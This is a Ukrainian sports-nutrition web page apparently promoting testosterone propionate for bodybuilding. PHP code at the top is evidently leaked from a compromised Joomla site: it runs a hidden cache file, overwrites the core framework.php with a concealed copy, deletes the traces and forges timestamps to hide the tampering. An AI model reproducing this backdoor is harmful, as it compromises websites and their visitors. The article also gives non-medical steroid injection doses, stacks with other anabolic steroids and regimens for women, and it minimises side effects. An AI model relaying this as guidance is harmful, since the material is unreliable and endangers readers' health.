$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Тестостерон Пропіонат | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Тестостерон Пропіонат

Тестостерон ПропіонатДіюча хімічна речовина:
тестостерон пропіонат

Торговельні назви:
Тестопін-50; B.M. Pharmaceuticals, 50 мг/мол; Індія
Тестопін-100; B.M. Pharmaceuticals, 100 мг/мол; Індія

 

 

Тестостерон пропіонат - один з ін'єкційних складних ефірів тестостерону, який вимагає докладного опису. Це має сенс вже тому, що багато атлетів ігнорують цей препатат на відміну від ципіонату й широко розповсюдженого й вживаного  у Німеччині енантата. Читач обуриться, для чого взагалі  описувати рідко вживаний препарат. На перший погляд у ньому немає нічого незвичайного, але якщо до нього придивитися, стає ясно, для чого його слід описати.

Тестостерон пропіонат мало цінується у важкій атлетиці, пауерліфтінгу й бодібілдингу не тому, що він не приносить користі, а тому, що більшість  нічого не знають про тестостерон пропіонат і його можливості та правильне застосування.  Ми не будемо стверджувати, що пропіонат - найефективніший ефір тестостерону, але  все ж таки в окремих випадках вживання він відрізняється від енантата, ципіоната й ундеканоата, тому що він має якості, які ці популярні тестостерони не мають.

Головна відмінність між пропіонатом, ципіонатом і енантатом у тривалості впливу. На відміну від довгодіючих енантата й ципіоната, пропіонат має значно більш коротку тривалість дії. "Тестостерон пропіонат впливає на організм 1 - 2 дні". У своїй книзі " Допінг-Заборонені лікарські засоби в спорті" доктор Дирк Клазинг і викладач спортвуза в Кельні найбільш відомий професор, доктор Манфред Доніке, підтверджують ці данні: "При внутрішньом'язовому застосуванні ефірів тестостерону тривалість їх впливу на організм залежить від виду ефіру (тестостерон енантат і ципіонат діють довше, чим пропіонат і ацетат) і від кількості тестостерону. При ін'єкціях 50 мг тестостерону пропіоната підвищений рівень тестостерону спостерігається 1 - 2 дня, при ін'єкціях 250 мг тестостерон енантата - 1 - 2 тижня". Ствердження, що пропіонат всього лише більш швидкодіючий тестостерон і, отже, повинен вводитись частіше, занадто зпрощує справу.

На підставі  сильної андрогенної дії пропіонат, так саме як  і енантат і ципіонат відмінно діє  для нарощування сили й маси мязів. Різниця між ними в тому, що приймаючи пропіонат, атлет накопичує значно менше води. Так як вплив від прийому пропіоната починається дуже швидко, вже через 1 - 2 дні атлет почуває підйом енергії і бажання тренуватися, кращий памп, підвищений апетит, легкий приріст сили. У якості початкової дози більшість атлетів віддають перевагу ін'єкції 50 - 100 мг. Це дає можливость: почати триваючий кілька тижнів курс тестостерон енантата, уводячи швидкодіючий пропіонат. Ті, хто не прагне довго чекати впливу стероїдів тривалої дії на початку курсу  роблять ін'єкцію 250 мг тестостерон енантата і 50 мг тестостерон пропіоната. Якщо через 2 дні дія пропіоната слабшає, знову робиться ін'єкція 50 мг. Ще через 2 дня підвищений завдяки пропіонату рівень тестостерону знову знижується.

Так як в організмі до цього часу вже проявляється дія енантата, подальші ін'єкції пропіоната необов'язкові. У такий спосіб атлет досягає високого рівня тестостерону дуже швидко, а завдяки  тривалої дії цей рівень зберігається надовго. Це, наприклад, важливо для атлетів, які з Анаполоном 50, що застосовувався понад 6 тижнів, сильно додали у вазі й тепер прагли б перейти на тестостерон. Так як буквально відразу після завершення приймання Анаполона 50 починається втрата доягнутих результатів, бажаний швидкий і високий рівень тестостерону.

Друга можливість: додавання  тестостеронуапропіоната під час приймання іншого препарату. Це допускає  введення ін'єкції пропіоната регулярно щонайменше кожний другий день. Кращі результати досягаються при дозі 50 - 100 мг у день, а також кожний другий день. Атлет накопичить при цьому, як вже згадувалось, меншу кількість води, ніж при тестостеронах тривалої дії, тому пропіонат охоче застосовують бодібілдери, які з енантатом накопичують зайву воду в організмі. Для нарощування маси добре діє комбінація з 100 мг тестостерон пропіоната кожні 2 дня, 50 мг Вінстрола тривалої дії через день, 30 мг Діанабола в день. Своє головне призначення знаходить пропіонат найчастіше в підготовці до чемпіонатів і у жінок. Проведену в цю фазу дієту часто зв'язують із тестостероном, щоб зберегти максимум м'язової маси, м'язового об'єму й пружності.

Жінки особливо люблять пропіонат, тому що при правильнім його застосуванні можна уникнути побічних явищ при прийомі андрогенних препаратів. Важливим ньюансом вважається що треба збільшити проміжки між ін'єкціями, щоб рівень тестостерону міг знову опускатися і при цьому не відбувалося накопичення андрогенів у жіночому організмі. Тому жінки приймають пропіонат кожні 5 - 7 днів і досягають при цьому значних результатів. Андрогенна дія пропіоната забезпечує добре тренованим жінкам кращу регенерацію без прояву ефектів маскулінізації. Дозування найчастіше - 25 - 50 мг в ін'єкцію. Більш високі дози й більш часті вкалувания приносять, звичайно, кращі результати, але їх не радять жінкам. Тривалість приймання не повинна перевищувати 8 - 10 тижнів, але для збільшення синтезу протеїнів вона може бути доповнена м'якими й головним чином анаболічно діючими стероїдами, такими як Примоболан, Дураболін, Анадур і т.д.

Чоловіки, які бояться вживати тестостерон, боячись можливих побічних явищ, можуть дати шанс пропіонату. Побічні явища при пропіонаті зустрічаються рідше й не так ярко виражені. Справа в тому, що тижнева доза пропіоната, як правило, значно менше випадає в осад, ніж тестостерони тривалої дії. Щоденна 50 мг ін'єкція становить тижневу дозу лише в 350 мг, у той час як більший ін'єкції тестостеронів тривалої дії легко укладаються в чотиризначний діапазон. Крім того, пропіонат у порівнянні з енантатом і ципіонатом є більш "м'якою" хімічною речовиною й тому переноситься організмом краще. Хто неодмінно думає, що йому потрібні щоденні ін'єкції тестостерону, повинен подумати про приймання пропіонату.

Ключ до успіху при прийманні пропіоната лежить у регулярних ін'єкціях в  малих кількостях препарату (50 - 100 мг кожні 1 - 2 дня). Деякі штангісти й силовики часто вводять собі в день перед змаганнями велику кількість тестостерон пропіоната, щоб наступного дня з високим рівнем тестостерону й андрогенів у крові встановлювати нові рекорди. Штангісти колишньої ГДР були відмінними майстрами цієї тактики, тому що знали вже давно, що: "Високий рівень тестостерону - необхідна передумова для рекордів."

Хоча побічні явища пропіоната й схожі на побічні явища енантата й ципіоната, вони проявляються рідше. І все ж таки при відповідній генетичній схильності й дуже високих дозах можуть виникнути відомі андрогенно обумовлені побічні ефекти: вугрі, випадання волосся на голові, посилене оволосіння на тілі, зниження тембру голосу. Підвищене лібідо часто спостерігається як у чоловіків, так і в жінок. Гінекомастія незважаючи на високий рівень конвертованості пропіоната проявляється рідше, чим при прийманні інших тестостеронів. Те ж можна сказати й щодо можливого накопичення води в організмі, тому що водно-електролітна ретенція при прийманні пропіоната виражена не так яскраво. Приймання тестостероностимулюючих препаратів  типу Трибулус Терестіс все-таки можливе і при пропіонаті, тому що він впливає на дугу "Гіпоталамус - Гіпофіз - Яєчка" і пригнічує ендогенне вироблення гормонів. Токсичний вплив на печінку мінімальний,  тому ушкодження печінки  майже виключено. Єдина незручність, при прийомі атлетом пропіоната - це часті ін'єкції.

Джерело: http://athlete.ru/

 
Статті СТЕРОЇДИ Тестостерон Пропіонат